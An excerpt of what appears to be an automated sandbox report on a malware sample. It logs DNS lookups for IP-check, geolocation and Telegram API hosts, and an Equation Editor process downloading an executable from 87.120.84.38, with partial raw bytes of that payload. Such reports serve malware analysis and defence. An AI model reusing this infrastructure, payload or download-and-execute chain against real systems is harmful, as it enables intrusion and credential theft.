                                                                                                          Oct 30, 2024 08:32:10.255556107 CET8.8.8.8192.168.2.220xa2eaNo error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:32:10.255556107 CET8.8.8.8192.168.2.220xa2eaNo error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:32:12.845346928 CET8.8.8.8192.168.2.220x1a6bNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:32:12.845346928 CET8.8.8.8192.168.2.220x1a6bNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:32:12.845346928 CET8.8.8.8192.168.2.220x1a6bNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:32:12.845346928 CET8.8.8.8192.168.2.220x1a6bNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:32:12.845346928 CET8.8.8.8192.168.2.220x1a6bNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:32:12.845346928 CET8.8.8.8192.168.2.220x1a6bNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:32:12.866866112 CET8.8.8.8192.168.2.220xe98No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:32:12.866866112 CET8.8.8.8192.168.2.220xe98No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:32:12.866866112 CET8.8.8.8192.168.2.220xe98No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:32:12.866866112 CET8.8.8.8192.168.2.220xe98No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:32:12.866866112 CET8.8.8.8192.168.2.220xe98No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:32:12.866866112 CET8.8.8.8192.168.2.220xe98No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:32:13.885658979 CET8.8.8.8192.168.2.220x131fNo error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:32:13.885658979 CET8.8.8.8192.168.2.220x131fNo error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:32:15.142138004 CET8.8.8.8192.168.2.220xf0b4No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:32:15.142138004 CET8.8.8.8192.168.2.220xf0b4No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:32:15.142138004 CET8.8.8.8192.168.2.220xf0b4No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:32:15.142138004 CET8.8.8.8192.168.2.220xf0b4No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:32:15.142138004 CET8.8.8.8192.168.2.220xf0b4No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:32:15.142138004 CET8.8.8.8192.168.2.220xf0b4No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:32:15.183909893 CET8.8.8.8192.168.2.220x3c4eNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:32:15.183909893 CET8.8.8.8192.168.2.220x3c4eNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:32:15.183909893 CET8.8.8.8192.168.2.220x3c4eNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:32:15.183909893 CET8.8.8.8192.168.2.220x3c4eNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:32:15.183909893 CET8.8.8.8192.168.2.220x3c4eNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:32:15.183909893 CET8.8.8.8192.168.2.220x3c4eNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:32:16.094695091 CET8.8.8.8192.168.2.220xf8dcNo error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:32:16.094695091 CET8.8.8.8192.168.2.220xf8dcNo error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:32:16.879915953 CET8.8.8.8192.168.2.220x182dNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:32:16.879915953 CET8.8.8.8192.168.2.220x182dNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:32:16.879915953 CET8.8.8.8192.168.2.220x182dNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:32:16.879915953 CET8.8.8.8192.168.2.220x182dNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:32:16.879915953 CET8.8.8.8192.168.2.220x182dNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:32:16.879915953 CET8.8.8.8192.168.2.220x182dNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:32:16.889272928 CET8.8.8.8192.168.2.220x17e4No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:32:16.889272928 CET8.8.8.8192.168.2.220x17e4No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:32:16.889272928 CET8.8.8.8192.168.2.220x17e4No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:32:16.889272928 CET8.8.8.8192.168.2.220x17e4No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:32:16.889272928 CET8.8.8.8192.168.2.220x17e4No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:32:16.889272928 CET8.8.8.8192.168.2.220x17e4No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:32:18.027404070 CET8.8.8.8192.168.2.220xa14aNo error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:32:18.027404070 CET8.8.8.8192.168.2.220xa14aNo error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:32:18.814678907 CET8.8.8.8192.168.2.220xb211No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:32:18.814678907 CET8.8.8.8192.168.2.220xb211No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:32:18.814678907 CET8.8.8.8192.168.2.220xb211No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:32:18.814678907 CET8.8.8.8192.168.2.220xb211No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:32:18.814678907 CET8.8.8.8192.168.2.220xb211No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:32:18.814678907 CET8.8.8.8192.168.2.220xb211No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:32:18.825968981 CET8.8.8.8192.168.2.220x882fNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:32:18.825968981 CET8.8.8.8192.168.2.220x882fNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:32:18.825968981 CET8.8.8.8192.168.2.220x882fNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:32:18.825968981 CET8.8.8.8192.168.2.220x882fNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:32:18.825968981 CET8.8.8.8192.168.2.220x882fNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:32:18.825968981 CET8.8.8.8192.168.2.220x882fNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:32:19.760027885 CET8.8.8.8192.168.2.220x1d6cNo error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:32:19.760027885 CET8.8.8.8192.168.2.220x1d6cNo error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:32:20.713062048 CET8.8.8.8192.168.2.220x9a1aNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:32:20.713062048 CET8.8.8.8192.168.2.220x9a1aNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:32:20.713062048 CET8.8.8.8192.168.2.220x9a1aNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:32:20.713062048 CET8.8.8.8192.168.2.220x9a1aNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:32:20.713062048 CET8.8.8.8192.168.2.220x9a1aNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:32:20.713062048 CET8.8.8.8192.168.2.220x9a1aNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:32:20.723248959 CET8.8.8.8192.168.2.220xd529No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:32:20.723248959 CET8.8.8.8192.168.2.220xd529No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:32:20.723248959 CET8.8.8.8192.168.2.220xd529No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:32:20.723248959 CET8.8.8.8192.168.2.220xd529No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:32:20.723248959 CET8.8.8.8192.168.2.220xd529No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:32:20.723248959 CET8.8.8.8192.168.2.220xd529No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:32:20.730690002 CET8.8.8.8192.168.2.220xd529No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:32:20.730690002 CET8.8.8.8192.168.2.220xd529No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:32:20.730690002 CET8.8.8.8192.168.2.220xd529No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:32:20.730690002 CET8.8.8.8192.168.2.220xd529No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:32:20.730690002 CET8.8.8.8192.168.2.220xd529No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:32:20.730690002 CET8.8.8.8192.168.2.220xd529No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:32:21.653876066 CET8.8.8.8192.168.2.220x9e24No error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:32:21.653876066 CET8.8.8.8192.168.2.220x9e24No error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:32:22.445962906 CET8.8.8.8192.168.2.220xdd84No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:32:22.445962906 CET8.8.8.8192.168.2.220xdd84No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:32:22.445962906 CET8.8.8.8192.168.2.220xdd84No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:32:22.445962906 CET8.8.8.8192.168.2.220xdd84No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:32:22.445962906 CET8.8.8.8192.168.2.220xdd84No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:32:22.445962906 CET8.8.8.8192.168.2.220xdd84No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:32:22.455332994 CET8.8.8.8192.168.2.220x46ccNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:32:22.455332994 CET8.8.8.8192.168.2.220x46ccNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:32:22.455332994 CET8.8.8.8192.168.2.220x46ccNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:32:22.455332994 CET8.8.8.8192.168.2.220x46ccNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:32:22.455332994 CET8.8.8.8192.168.2.220x46ccNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:32:22.455332994 CET8.8.8.8192.168.2.220x46ccNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:32:24.123392105 CET8.8.8.8192.168.2.220x1b7aNo error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:32:24.123392105 CET8.8.8.8192.168.2.220x1b7aNo error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:32:24.922545910 CET8.8.8.8192.168.2.220x1811No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:32:24.922545910 CET8.8.8.8192.168.2.220x1811No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:32:24.922545910 CET8.8.8.8192.168.2.220x1811No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:32:24.922545910 CET8.8.8.8192.168.2.220x1811No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:32:24.922545910 CET8.8.8.8192.168.2.220x1811No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:32:24.922545910 CET8.8.8.8192.168.2.220x1811No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:32:25.263012886 CET8.8.8.8192.168.2.220x6caaNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:32:25.263012886 CET8.8.8.8192.168.2.220x6caaNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:32:25.263012886 CET8.8.8.8192.168.2.220x6caaNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:32:25.263012886 CET8.8.8.8192.168.2.220x6caaNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:32:25.263012886 CET8.8.8.8192.168.2.220x6caaNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:32:25.263012886 CET8.8.8.8192.168.2.220x6caaNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:32:28.133884907 CET8.8.8.8192.168.2.220xcfe6No error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:32:28.133884907 CET8.8.8.8192.168.2.220xcfe6No error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                                                                                          Oct 30, 2024 08:32:28.954361916 CET8.8.8.8192.168.2.220x413fNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false

                                                                                                          HTTP Request Dependency Graph

                                                                                                          • reallyfreegeoip.org
                                                                                                          • api.telegram.org
                                                                                                          • 87.120.84.38
                                                                                                          • checkip.dyndns.org

                                                                                                          HTTP Packets

                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          0192.168.2.224916487.120.84.38803616C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Oct 30, 2024 08:31:59.670418978 CET322OUTGET /txt/pgTQ4mfZBbJhpdd.exe HTTP/1.1
                                                                                                          Accept: */*
                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                          Host: 87.120.84.38
                                                                                                          Connection: Keep-Alive
                                                                                                          Oct 30, 2024 08:32:00.624047041 CET1236INHTTP/1.1 200 OK
                                                                                                          Server: nginx/1.26.2
                                                                                                          Date: Wed, 30 Oct 2024 07:32:00 GMT
                                                                                                          Content-Type: application/x-msdos-program
                                                                                                          Content-Length: 787456
                                                                                                          Connection: keep-alive
                                                                                                          Last-Modified: Tue, 29 Oct 2024 06:13:05 GMT
                                                                                                          ETag: "c0400-625977a7fa7d4"
                                                                                                          Accept-Ranges: bytes
                                                                                                          Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 58 f4 f3 fa 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 fa 0b 00 00 08 00 00 00 00 00 00 c2 19 0c 00 00 20 00 00 00 20 0c 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 0c 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 6e 19 0c 00 4f 00 00 00 00 20 0c 00 a4 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0c 00 0c 00 00 00 98 f6 0b 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELX0 @ `@nO @p H.text `.rsrc @@.reloc@@BHui^@X0((}&*0{+*0%{o(&rpsz*0)(,(}{&*"#0E{o {(,(}{{&*>?0s!b%,(rOp~("s#
                                                                                                          Oct 30, 2024 08:32:00.624128103 CET212INData Raw: 00 00 0a 0c 2b 7c 00 08 6f 24 00 00 0a 0d 09 07 6f 25 00 00 0a 13 04 11 04 28 01 00 00 2b 1c fe 01 13 05 11 05 2c 5a 00 73 20 00 00 06 13 06 11 06 11 04 16 9a 6f 15 00 00 06 00 11 06 11 04 17 9a 6f 17 00 00 06 00 11 06 11 04 18 9a 6f 19 00 00 06
                                                                                                          Data Ascii: +|o$o%(+,Zs ooooooo'o(:ro)&+*0is(r
                                                                                                          Oct 30, 2024 08:32:00.624140024 CET1236INData Raw: 4f 00 00 70 02 6f 1a 00 00 06 16 02 6f 1a 00 00 06 6f 2a 00 00 0a 1a 59 6f 2b 00 00 0a 72 53 00 00 70 28 2c 00 00 0a 73 23 00 00 0a 0b 06 07 6f 24 00 00 0a 6f 0c 00 00 06 00 06 07 6f 2d 00 00 0a 6f 0e 00 00 06 00 07 6f 29 00 00 0a 00 00 de 04 26
                                                                                                          Data Ascii: Opooo*Yo+rSp(,s#o$oo-oo)&+*X_09(rOpooooo*Yo+rSp(,s.oo/oo/o0(rOp~("s.
                                                                                                          Oct 30, 2024 08:32:00.624151945 CET1236INData Raw: 28 3c 00 00 0a 6f 3d 00 00 0a 00 02 7b 14 00 00 04 02 7b 0f 00 00 04 6f 0d 00 00 06 6f 3b 00 00 0a 00 00 de 11 0a 00 06 6f 3e 00 00 0a 28 3f 00 00 0a 26 00 de 00 2a 00 00 00 01 10 00 00 00 00 01 00 de df 00 11 12 00 00 01 13 30 02 00 2b 00 00 00
                                                                                                          Data Ascii: (<o={{oo;o>(?&*0+,{+,{o5(@*0sA}sB}sB}sC}sB}sA}{oD{oD(E{
                                                                                                          Oct 30, 2024 08:32:00.624171972 CET1236INData Raw: 00 0a 00 02 28 61 00 00 0a 02 7b 15 00 00 04 6f 62 00 00 0a 00 02 28 61 00 00 0a 02 7b 13 00 00 04 6f 62 00 00 0a 00 02 28 61 00 00 0a 02 7b 12 00 00 04 6f 62 00 00 0a 00 02 28 61 00 00 0a 02 7b 11 00 00 04 6f 62 00 00 0a 00 02 72 c7 01 00 70 28
                                                                                                          Data Ascii: (a{ob(a{ob(a{ob(a{obrp(Hrpo;"sc(d{oe{oe(f(g*0L}(h(i(57sj(kol(mon(o
                                                                                                          Oct 30, 2024 08:32:00.624187946 CET636INData Raw: 0e 00 02 7b 17 00 00 04 6f 83 00 00 06 00 00 00 2a 00 13 30 02 00 53 00 00 00 00 00 00 00 00 02 72 25 02 00 70 28 7b 00 00 0a 00 02 72 37 02 00 70 28 7d 00 00 0a 00 02 72 39 02 00 70 28 7f 00 00 0a 00 02 17 28 85 00 00 0a 00 02 17 6f 8a 00 00 0a
                                                                                                          Data Ascii: {o*0Sr%p({r7p(}r9p((osl}(k{oy*0+*0o,(3*0{s&ssso~ooo&oo
                                                                                                          Oct 30, 2024 08:32:00.624202013 CET1236INData Raw: 00 0a 7d 1b 00 00 04 02 28 38 00 00 0a 72 79 00 00 70 28 39 00 00 0a 7d 1c 00 00 04 02 23 00 00 00 00 00 00 00 00 7d 1d 00 00 04 02 16 7d 1f 00 00 04 02 14 7d 21 00 00 04 02 14 7d 22 00 00 04 02 28 3a 00 00 0a 00 00 02 28 4c 00 00 06 00 02 7b 21
                                                                                                          Data Ascii: }(8ryp(9}#}}}!}"(:(L{!%rp(s%rp(s%rp(*0Y{X}{.{l(rp(o;{<(I(rp(o;*
                                                                                                          Oct 30, 2024 08:32:00.624214888 CET1236INData Raw: 00 00 19 00 00 11 00 02 16 7d 1f 00 00 04 02 7b 1e 00 00 04 6f c2 00 00 0a 00 00 02 02 7b 20 00 00 04 17 59 7d 20 00 00 04 02 7b 20 00 00 04 16 fe 04 0c 08 2c 1a 00 02 02 7b 1a 00 00 04 6f 02 00 00 06 6f b8 00 00 0a 17 59 7d 20 00 00 04 00 02 7b
                                                                                                          Data Ascii: }{o{ Y} { ,{ooY} {{o{ oo(9{#{o{ oorp{o{ oo("o;{{o{ oo(9(<{%
                                                                                                          Oct 30, 2024 08:32:00.624228954 CET424INData Raw: 22 00 00 04 14 fe 03 2b 01 16 0a 06 2c 0e 00 02 7b 22 00 00 04 6f 35 00 00 0a 00 00 02 03 28 40 00 00 0a 00 2a 00 13 30 07 00 a4 12 00 00 1d 00 00 11 00 02 73 c9 00 00 0a 7d 22 00 00 04 02 73 42 00 00 0a 7d 23 00 00 04 02 73 42 00 00 0a 7d 24 00
                                                                                                          Data Ascii: "+,{"o5(@*0s}"sB}#sB}$s}&s})s}'s}(s}*{"s}3s}4{"s}+sB},{"s}-sB}.s}8sA}:
                                                                                                          Oct 30, 2024 08:32:00.624241114 CET1236INData Raw: 00 02 7b 31 00 00 04 6f 44 00 00 0a 00 02 7b 30 00 00 04 6f 44 00 00 0a 00 02 7b 25 00 00 04 6f 44 00 00 0a 00 02 7b 37 00 00 04 6f 44 00 00 0a 00 02 7b 2f 00 00 04 6f 44 00 00 0a 00 02 7b 36 00 00 04 6f 44 00 00 0a 00 02 7b 39 00 00 04 6f 44 00
                                                                                                          Data Ascii: {1oD{0oD{%oD{7oD{/oD{6oD{9oD{=oD(E{#oN{#(oP{#rCp"AsQoR{#(\oT{# usFoG{#so{#rpoH
                                                                                                          Oct 30, 2024 08:32:00.629715919 CET1236INData Raw: 04 1f 7c 1f 16 73 49 00 00 0a 6f ef 00 00 0a 00 02 7b 34 00 00 04 72 dd 05 00 70 6f f0 00 00 0a 00 02 7b 34 00 00 04 02 fe 06 47 00 00 06 73 63 00 00 0a 6f f1 00 00 0a 00 02 7b 2b 00 00 04 1e 6f f2 00 00 0a 00 02 7b 2b 00 00 04 1f 32 1f 32 73 49
                                                                                                          Data Ascii: |sIo{4rpo{4Gsco{+o{+22sIo{+(o{,oN{, 2sFoG{,so{,rpoH{,sIoJ{,oU{-:sco{


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          1192.168.2.2249165132.226.8.169803872C:\Users\user\AppData\Roaming\cdlpohalgate39567.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Oct 30, 2024 08:32:08.458013058 CET151OUTGET / HTTP/1.1
                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                          Host: checkip.dyndns.org
                                                                                                          Connection: Keep-Alive
                                                                                                          Oct 30, 2024 08:32:09.450103045 CET275INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 30 Oct 2024 07:32:09 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 106
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.78</body></html>
                                                                                                          Oct 30, 2024 08:32:09.661968946 CET275INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 30 Oct 2024 07:32:09 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 106
                                                                                                          Connection: keep-alive
                                                                                                          Cache-Control: no-cache
                                                                                                          Pragma: no-cache
